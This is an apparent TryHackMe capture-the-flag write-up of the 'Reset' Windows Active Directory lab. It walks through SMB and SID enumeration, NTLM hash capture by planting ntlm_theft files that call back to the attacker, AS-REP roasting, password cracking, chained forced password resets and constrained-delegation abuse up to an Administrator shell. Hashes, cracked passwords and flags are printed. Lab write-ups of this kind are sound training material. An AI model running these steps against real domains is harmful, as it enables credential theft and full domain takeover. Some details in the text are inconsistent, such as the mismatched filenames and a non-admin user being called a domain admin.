Reset
- 🌐 Website: TryHackMe
- 🔥 Level: Hard
- 🖥️ OS: Windows
- 🔗 Link: Reset
❓Question¶
What is the user flag?
📋 Walkthrough¶
Let's run a quick nmap scan to see the open ports:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ nmap --min-rate=10000 10.80.159.74 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-30 11:43 CET
Nmap scan report for 10.80.159.74
Host is up (0.44s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
7680/tcp open pando-pub
9389/tcp open adws
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49673/tcp open unknown
49676/tcp open unknown
49702/tcp open unknown
Let's run a more detailed nmap scan on the discovered ports:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ nmap --min-rate=10000 -p53,135,139,389,445,464,593,636,3268,3269,3389,5985,7680,9389,49669,49670,49671,49673,49676,49702 -sV -sC 10.80.159.74
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-30 11:45 CET
Nmap scan report for 10.80.159.74
Host is up (0.089s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-10-30T10:46:59+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: THM
| NetBIOS_Domain_Name: THM
| NetBIOS_Computer_Name: HAYSTACK
| DNS_Domain_Name: thm.corp
| DNS_Computer_Name: HayStack.thm.corp
| DNS_Tree_Name: thm.corp
| Product_Version: 10.0.17763
|_ System_Time: 2025-10-30T10:46:19+00:00
| ssl-cert: Subject: commonName=HayStack.thm.corp
| Not valid before: 2025-10-29T10:41:03
|_Not valid after: 2026-04-30T10:41:03
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp open pando-pub?
9389/tcp open mc-nmf .NET Message Framing
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HAYSTACK; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-10-30T10:46:20
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.79 seconds
There's an active SMB service, let's try to enumerate the shares with smbclient:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ smbclient -L //10.80.159.74
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.80.159.74 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ smbclient -N //10.80.159.74/Data
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jul 19 10:40:57 2023
.. D 0 Wed Jul 19 10:40:57 2023
onboarding D 0 Thu Oct 30 12:02:36 2025
7863807 blocks of size 4096. 3001613 blocks available
smb: \> cd onboarding
smb: \onboarding\> dir
. D 0 Thu Oct 30 12:03:36 2025
.. D 0 Thu Oct 30 12:03:36 2025
fyffawnb.qa1.pdf A 3032659 Mon Jul 17 10:12:09 2023
gy0x23zz.ref.pdf A 4700896 Mon Jul 17 10:11:53 2023
szvm0b0f.1ae.txt A 521 Mon Aug 21 20:21:59 2023
7863807 blocks of size 4096. 3001517 blocks available
smb: \onboarding\>
Let's download everything and analyze them locally:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ cat iitvpket.vkr.txt
Subject: Welcome to Reset -�Dear <USER>,Welcome aboard! We are thrilled to have you join our team. As discussed during the hiring process, we are sending you the necessary login information to access your company account. Please keep this information confidential and do not share it with anyone.The initial passowrd is: ResetMe123!We are confident that you will contribute significantly to our continued success. We look forward to working with you and wish you the very best in your new role.Best regards,The Reset Team
We found the initial password: ResetMe123!
The PDFs are presentations. I tried checking with exiftool if there's any hidden information, but nothing interesting. Opening one of the two however, we can see the same text but with a different user: LILY ONEILL.
Before proceeding with a username bruteforce attempt, I'd like to analyze the remaining ports. I see an HTTP port open on 5985, let's try opening it in the browser:
I runferoxbuster to see if there are any hidden directories but there seems to be nothing. Let's try to login to SMB using username variants based on LILY ONEILL with the password we found ResetMe123!. But none seem to actually work. We need more information. Let's try to enumerate users with rpcclient:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ rpcclient -U "thm.corp/guest" 10.80.159.74
Password for [THM.CORP\guest]:
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $>
Let's try with lookupsid:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ impacket-lookupsid THM.CORP/guest@10.80.159.74
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Brute forcing SIDs at 10.80.159.74
[*] StringBinding ncacn_np:10.80.159.74[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1966530601-3185510712-10604624
498: THM\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: THM\Administrator (SidTypeUser)
501: THM\Guest (SidTypeUser)
502: THM\krbtgt (SidTypeUser)
512: THM\Domain Admins (SidTypeGroup)
513: THM\Domain Users (SidTypeGroup)
514: THM\Domain Guests (SidTypeGroup)
515: THM\Domain Computers (SidTypeGroup)
516: THM\Domain Controllers (SidTypeGroup)
517: THM\Cert Publishers (SidTypeAlias)
518: THM\Schema Admins (SidTypeGroup)
519: THM\Enterprise Admins (SidTypeGroup)
520: THM\Group Policy Creator Owners (SidTypeGroup)
521: THM\Read-only Domain Controllers (SidTypeGroup)
522: THM\Cloneable Domain Controllers (SidTypeGroup)
525: THM\Protected Users (SidTypeGroup)
526: THM\Key Admins (SidTypeGroup)
527: THM\Enterprise Key Admins (SidTypeGroup)
553: THM\RAS and IAS Servers (SidTypeAlias)
571: THM\Allowed RODC Password Replication Group (SidTypeAlias)
572: THM\Denied RODC Password Replication Group (SidTypeAlias)
1008: THM\HAYSTACK$ (SidTypeUser)
1109: THM\DnsAdmins (SidTypeAlias)
1110: THM\DnsUpdateProxy (SidTypeGroup)
1111: THM\3091731410SA (SidTypeUser)
1112: THM\ERNESTO_SILVA (SidTypeUser)
1113: THM\TRACY_CARVER (SidTypeUser)
1114: THM\SHAWNA_BRAY (SidTypeUser)
1115: THM\CECILE_WONG (SidTypeUser)
1116: THM\CYRUS_WHITEHEAD (SidTypeUser)
1117: THM\DEANNE_WASHINGTON (SidTypeUser)
1118: THM\ELLIOT_CHARLES (SidTypeUser)
1119: THM\MICHEL_ROBINSON (SidTypeUser)
1120: THM\MITCHELL_SHAW (SidTypeUser)
1121: THM\FANNY_ALLISON (SidTypeUser)
1122: THM\JULIANNE_HOWE (SidTypeUser)
1123: THM\ROSLYN_MATHIS (SidTypeUser)
1124: THM\DANIEL_CHRISTENSEN (SidTypeUser)
1125: THM\MARCELINO_BALLARD (SidTypeUser)
1126: THM\CRUZ_HALL (SidTypeUser)
1127: THM\HOWARD_PAGE (SidTypeUser)
1128: THM\STEWART_SANTANA (SidTypeUser)
1130: THM\LINDSAY_SCHULTZ (SidTypeUser)
1131: THM\TABATHA_BRITT (SidTypeUser)
1132: THM\RICO_PEARSON (SidTypeUser)
1133: THM\DARLA_WINTERS (SidTypeUser)
1134: THM\ANDY_BLACKWELL (SidTypeUser)
1135: THM\LILY_ONEILL (SidTypeUser)
1136: THM\CHERYL_MULLINS (SidTypeUser)
1137: THM\LETHA_MAYO (SidTypeUser)
1138: THM\HORACE_BOYLE (SidTypeUser)
1139: THM\CHRISTINA_MCCORMICK (SidTypeUser)
1141: THM\3811465497SA (SidTypeUser)
1142: THM\MORGAN_SELLERS (SidTypeUser)
1143: THM\MARION_CLAY (SidTypeUser)
1144: THM\3966486072SA (SidTypeUser)
1146: THM\TED_JACOBSON (SidTypeUser)
1147: THM\AUGUSTA_HAMILTON (SidTypeUser)
1148: THM\TREVOR_MELTON (SidTypeUser)
1149: THM\LEANN_LONG (SidTypeUser)
1150: THM\RAQUEL_BENSON (SidTypeUser)
1151: THM\AN-173-distlist1 (SidTypeGroup)
1152: THM\Gu-gerardway-distlist1 (SidTypeGroup)
1154: THM\CH-ecu-distlist1 (SidTypeGroup)
1156: THM\AUTOMATE (SidTypeUser)
I was at a dead end here, but I noticed there's a user called AUTOMATE. It's probably a user used to execute automated tasks like replacing files in the Data share. Let's try using ntlm_theft to capture this user's hash:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ python3 ../ntlm_theft/ntlm_theft.py -g all -s 192.168.142.170 -f test
/home/kali/Desktop/THM/../ntlm_theft/ntlm_theft.py:168: SyntaxWarning: invalid escape sequence '\l'
location.href = 'ms-word:ofe|u|\\''' + server + '''\leak\leak.docx';
Created: test/test.scf (BROWSE TO FOLDER)
Created: test/test-(url).url (BROWSE TO FOLDER)
Created: test/test-(icon).url (BROWSE TO FOLDER)
Created: test/test.lnk (BROWSE TO FOLDER)
Created: test/test.rtf (OPEN)
Created: test/test-(stylesheet).xml (OPEN)
Created: test/test-(fulldocx).xml (OPEN)
Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(includepicture).docx (OPEN)
Created: test/test-(remotetemplate).docx (OPEN)
Created: test/test-(frameset).docx (OPEN)
Created: test/test-(externalcell).xlsx (OPEN)
Created: test/test.wax (OPEN)
Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: test/test.asx (OPEN)
Created: test/test.jnlp (OPEN)
Created: test/test.application (DOWNLOAD AND OPEN)
Created: test/test.pdf (OPEN AND ALLOW)
Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: test/test.library-ms (BROWSE TO FOLDER)
Created: test/Autorun.inf (BROWSE TO FOLDER)
Created: test/desktop.ini (BROWSE TO FOLDER)
Created: test/test.theme (THEME TO INSTALL
Generation Complete.
┌──(kali㉿kali)-[~/Desktop/THM/test] └─$ smbclient //10.80.159.74/Data -U "THM\LILY_ONAIL"
Password for [THM\LILY_ONAIL]: Try "help" to get a list of possible commands. smb: > cd onboarding smb: \onboarding> mput * Put file test-(remotetemplate).docx? y putting file test-(remotetemplate).docx as \onboarding\test-(remotetemplate).docx (83.4 kB/s) (average 83.4 kB/s) Put file test.lnk? y putting file test.lnk as \onboarding\test.lnk (12.6 kB/s) (average 58.4 kB/s) ...
Starting `responder` listening on SMB and NBNS, and opening one of the files generated by `ntlm_theft`, we manage to capture the NTLM hash of the `AUTOMATE` user:
[SMB] NTLMv2-SSP Client : 10.80.159.74 [SMB] NTLMv2-SSP Username : THM\AUTOMATE [SMB] NTLMv2-SSP Hash : AUTOMATE::THM:8ad41084d4538831:D52D1977087803B8369B10BA54E40A8E:010100000000000000778D3BC45EDC01E2CF9479510D563B00000000020008004B0058004500380001001E00570049004E002D004A005200430041003700390052004D0033003100590004003400570049004E002D004A005200430041003700390052004D003300310059002E004B005800450038002E004C004F00430041004C00030014004B005800450038002E004C004F00430041004C00050014004B005800450038002E004C004F00430041004C000700080000778D3BC45EDC0106000400020000000800300030000000000000000100000000200000892047527C7B8DF64AAB86490378FA5537B4691EC10E9DDC9F53494D2226F7BE0A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100340032002E003100370030000000000000000000 [] Skipping previously captured hash for THM\AUTOMATE [] Skipping previously captured hash for THM\AUTOMATE [] Skipping previously captured hash for THM\AUTOMATE [] Skipping previously captured hash for THM\AUTOMATE
Let's take the hash and try to crack it with `john`:
```sh
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Passw0rd1 (AUTOMATE)
1g 0:00:00:00 DONE (2025-11-26 11:07) 20.00g/s 4669Kp/s 4669Kc/s 4669KC/s froggy27..supergirl8
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
We have the password: Passw0rd1. Let's try to log in with evil-winrm:
Unfortunately I can't get in with this method. Let's try something else.
I was at a dead end here, I tried with GetNPUsers.py from impacket to see if it was possible to get the hash of any users. I created a users.txt file with all the users found (one per line) and ran the command:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ impacket-GetNPUsers -no-pass 'thm.corp/' -dc-ip 10.82.165.20 -request -usersfile users.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User HAYSTACK$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User 3091731410SA doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$ERNESTO_SILVA@THM.CORP:4d4b34b52412b30f44e62358ec7987fe$47b02cd32687a902c4ce82d5bdbd28b577fedaf4abc90506b272c96f55566967f45be20cfda7cf14d1bca5e49bca5221870412f78977f739118b5cb00861a00035d0ae11777922e50ea81b93734dbf15188f373f20b9f5d6625b38587cde9a02b9b666987bf7af0525101a17e05cc0d64de8c01a475c6ffbfbb400d80f436c40dd295e9594eea531e9bbcdafa776d0ec525a8669e0d0ce635be4d4a8a5c1482863ce1c954caa332a84720c0ce9569862332c11db26d4d7c92a5842a4fbeef65ce7ff310881a8eee4922799d96cc3063ce7d70a51a5fb8c13639aeec6f588c2489429d64e
[-] User TRACY_CARVER doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User SHAWNA_BRAY doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User CECILE_WONG doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User CYRUS_WHITEHEAD doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DEANNE_WASHINGTON doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ELLIOT_CHARLES doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User MICHEL_ROBINSON doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User MITCHELL_SHAW doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User FANNY_ALLISON doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User JULIANNE_HOWE doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ROSLYN_MATHIS doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DANIEL_CHRISTENSEN doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User MARCELINO_BALLARD doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User CRUZ_HALL doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HOWARD_PAGE doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User STEWART_SANTANA doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User LINDSAY_SCHULTZ doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$TABATHA_BRITT@THM.CORP:9baf8dbdf15b582b2a7078470f10ea7d$8f7f596df6f5654aa96ff7fccffbb9e398d01c34132e25da5524c170dfba07a636f51c7e06c8b0bb6f091689c2090da4fdba4814b6c5a7c2a71ba4d7089501c43b1abad35d4ed52b6ce21342e72659ab9c3c408368ad0aae0e819f342ba3479b3a471cf97bf5d8a0502f9a058c625970901952136cef174bf5fd6f179371ea7a172bedd4f55784ca4f6f464fe640034b3931af4ace7c9b4613ed0f84ad3e88dc757fc2916a37595d7a548b56e7e2d9578df0399813d02c89a6b7403a97a27f86e33efec7b1922b61a7931dd3f421bc47564566cf2954e5fb33d632fab515582eef9becd7
[-] User RICO_PEARSON doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DARLA_WINTERS doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ANDY_BLACKWELL doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User CHERYL_MULLINS doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User LETHA_MAYO doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HORACE_BOYLE doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User CHRISTINA_MCCORMICK doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User 3811465497SA doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User MORGAN_SELLERS doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User MARION_CLAY doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User 3966486072SA doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User TED_JACOBSON doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User AUGUSTA_HAMILTON doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User TREVOR_MELTON doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$LEANN_LONG@THM.CORP:0191665d71f20fca80cc3858b3e47960$0702590b2f551ca7e15fbd1aac951dac64133f6b2a9dc339631dbdbbfa795aa14b4e4c307e45f226fee09bd0786b9d2ac195bdbd4de0ab5c4536b9da92d796159785c0e3cc269a927e202fc8372c6b8a4cda4111f597b3d66bd4264047642cb2ae8ecb729c2100c50562ef16a28bfc06397adcf94b9bdf0598b49517d3b55cdd85c128aea49062459f436ecf0bae16ded091815bb6974a184744fd37a12de643a52950df3f211d99c71f76de10e06372197616b11271293b164faed8906d61bc78ffdd33aff670fa692f506c53d50ac5482baf6b4948d83b31ea8763b3b5f86c96686b4d
[-] User RAQUEL_BENSON doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User AUTOMATE doesn't have UF_DONT_REQUIRE_PREAUTH set
I obtained the hashes of 3 users: ERNESTO_SILVA, TABATHA_BRITT and LEANN_LONG. I save them in a hash file and try to crack them with john using the rockyou.txt wordlist:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ john hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
marlboro(1985) ($krb5asrep$23$TABATHA_BRITT@THM.CORP)
1g 0:00:00:02 DONE (2025-11-26 12:16) 0.4310g/s 6182Kp/s 8669Kc/s 8669KC/s !SkicA!..*7¡Vamos!
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
TABATHA_BRITT, the password is marlboro(1985). The user is enabled for RDP login, let's enter and get the first flag but I can't find it. I notice among the users the AUTOMATE user, I try to open powershell as this user: Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\TEMP> whoami
thm\automate
....
PS C:\Users\automate> tree /F
Folder PATH listing
Volume serial number is A8A4-C362
C:.
├───3D Objects
├───Contacts
├───Desktop
│ EC2 Feedback.website
│ EC2 Microsoft Windows Guide.website
│ user.txt
│
├───Documents
├───Downloads
├───Favorites
│ │ Bing.url
│ │
│ └───Links
├───Links
│ Desktop.lnk
│ Downloads.lnk
│
├───Music
├───Pictures
├───Saved Games
├───Searches
└───Videos
PS C:\Users\automate>
Answer
THM{AUTOMATION_WILL_REPLACE_US}
❓Question¶
What is the user flag?
📋 Walkthrough¶
Now let's try to do privilege escalation. Let's try to find some attack paths on BloodHound. Let's download and start the BloodHound GUI:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ bloodhound-python -d "THM.CORP" -u "TABATHA_BRITT" -p "marlboro(1985)" -ns 10.82.165.20 -c ALL
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: thm.corp
INFO: Getting TGT for user
INFO: Successfully authenticated to LDAP as THM.CORP\TABATHA_BRITT
INFO: Starting LDAP Enumeration
...
INFO: LDAP Enumeration completed
INFO: Writing output to ./bloodhound-Thm.Corp-TABATHA_BRITT.json
Let's import the generated JSON file into BloodHound and search for attack paths. We find a path that allows us to obtain the user flag: 
From the image we can see that we have GenericAll permissions on SHAWNA_BRAY, so we can change their password and login with their user to get the user flag.
I found it very useful to do this exercise manually as well, without BloodHound. Let's start by seeing who the domain admins are:
PS C:\Users\TEMP\Desktop> Get-ADGroup 'Domain Admins' | Get-ADGroupMember
distinguishedName : CN=Administrator,CN=Users,DC=thm,DC=corp
name : Administrator
objectClass : user
objectGUID : 6d2279fe-8712-4d84-9d82-6ca96f29d436
SamAccountName : Administrator
SID : S-1-5-21-1966530601-3185510712-10604624-500
distinguishedName : CN=CECILE_WONG,OU=ServiceAccounts,OU=FSR,OU=Tier 2,DC=thm,DC=corp
name : CECILE_WONG
objectClass : user
objectGUID : 5eceeb5b-bd89-4431-a5ec-fd2f72144de8
SamAccountName : CECILE_WONG
SID : S-1-5-21-1966530601-3185510712-10604624-1115
distinguishedName : CN=HORACE_BOYLE,OU=Test,OU=FSR,OU=Tier 2,DC=thm,DC=corp
name : HORACE_BOYLE
objectClass : user
objectGUID : ce910619-dc2d-496a-a142-647f5550dcac
SamAccountName : HORACE_BOYLE
SID : S-1-5-21-1966530601-3185510712-10604624-1138
Ok, we have 3 domain admins: Administrator, CECILE_WONG and HORACE_BOYLE. Let's see if we have GenericAll permissions on any user by running this one-liner PowerShell command that automatically gets the current user via whoami:
PS C:\Users\TEMP\Desktop> $currentUser = (whoami).ToUpper(); Get-ADUser -Filter * -Properties * | ForEach-Object { $user = $_; if ( (Get-ADUser -Identity $user.SamAccountName -Properties ntSecurityDescriptor).ntSecurityDescriptor.Access | Where-Object { $_.IdentityReference -eq $currentUser -and $_.ActiveDirectoryRights -eq "GenericAll" } ) { Write-Output $user.SamAccountName } }
SHAWNA_BRAY
RAQUEL_BENSON
PS C:\Users\TEMP\Desktop>
GenericAll permissions on two users: SHAWNA_BRAY and RAQUEL_BENSON. Let's try to change the password of SHAWNA_BRAY: PS C:\Users\TEMP\Desktop> Set-ADAccountPassword -Identity "SHAWNA_BRAY" -NewPassword (ConvertTo-SecureString -AsPlainText "NewPassw0rd!" -Force)
SHAWNA_BRAY and continue in the same way to find other permissions: Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\TEMP> whoami
thm\shawna_bray
PS C:\Users\TEMP>
Now we can see from bloodhound that SHAWNA_BRAY has ForceChangePassword permissions on CRUZ_HALL. Let's change their password similarly to before:
PS C:\Users\TEMP> Set-ADAccountPassword -Identity "CRUZ_HALL" -NewPassword (ConvertTo-SecureString -AsPlainText "NewPassw0rd!" -Force)
Let's verify by opening a powershell session as CRUZ_HALL:
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\TEMP> whoami
thm\cruz_hall
CRUZ_HALL has ForceChangePassword, Owns and GenericWrite permissions on DARLA_WINTERS, one of the domain admins. Let's change their password: PS C:\Users\TEMP> Set-ADAccountPassword -Identity "DARLA_WINTERS" -NewPassword (ConvertTo-SecureString -AsPlainText "NewPassw0rd!" -Force)
DARLA_WINTERS: Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\TEMP> whoami
thm\darla_winters
PS C:\Users\TEMP>
Now, DARLA_WINTERS has AllowToDelegate on HAYSTACK.THM.CORP, which is the domain controller. Let's try using getST.py as bloodhound suggests to obtain a TGS ticket for Administrator. First let's calculate the NT hash of DARLA_WINTERS's password NewPassw0rd!: 5FE2A4A4F217609A8E063620954D502A And now let's use getST.py:
getST.py -spn 'HTTP/PRIMARY.testlab.local' -impersonate 'admin' -altservice 'cifs' -hashes :2b576acbe6bcfda7294d6bd18041b8fe 'domain/victim'
Let's change the parameters with the correct ones:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ impacket-getST -spn 'CIFS/HAYSTACK.THM.CORP' -impersonate 'Administrator' -altservice 'cifs' -hashes :5FE2A4A4F217609A8E063620954D502A 'THM.CORP/DARLA_WINTERS' -dc-ip 10.82.165.20
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Changing service from CIFS/HAYSTACK.THM.CORP@THM.CORP to cifs/HAYSTACK.THM.CORP@THM.CORP
[*] Saving ticket in Administrator@cifs_HAYSTACK.THM.CORP@THM.CORP.ccache
┌──(kali㉿kali)-[~/Desktop/THM]
└─$
Administrator. Now let's import the ticket with export into the KRB5CCNAME environment variable and try to connect via SMB as Administrator using impacket-wmiexec: ──(kali㉿kali)-[~/Desktop/THM]
└─$ export KRB5CCNAME=Administrator@cifs_HAYSTACK.THM.CORP@THM.CORP.ccache
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ env | grep KRB
KRB5CCNAME=Administrator@cifs_HAYSTACK.THM.CORP@THM.CORP.ccache
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ impacket-wmiexec -k -no-pass Administrator@HAYSTACK.THM.CORP -target-ip 10.82.165.20
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\Users\Administrator>tree /F
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
Folder PATH listing
Volume serial number is A8A4-C362
C:.
����3D Objects
����Contacts
����Desktop
� EC2 Feedback.website
� EC2 Microsoft Windows Guide.website
� root.txt
�
����Documents
����Downloads
����Favorites
� � Bing.url
� �
� ����Links
����Links
� Desktop.lnk
� Downloads.lnk
�
����Music
����Pictures
����Saved Games
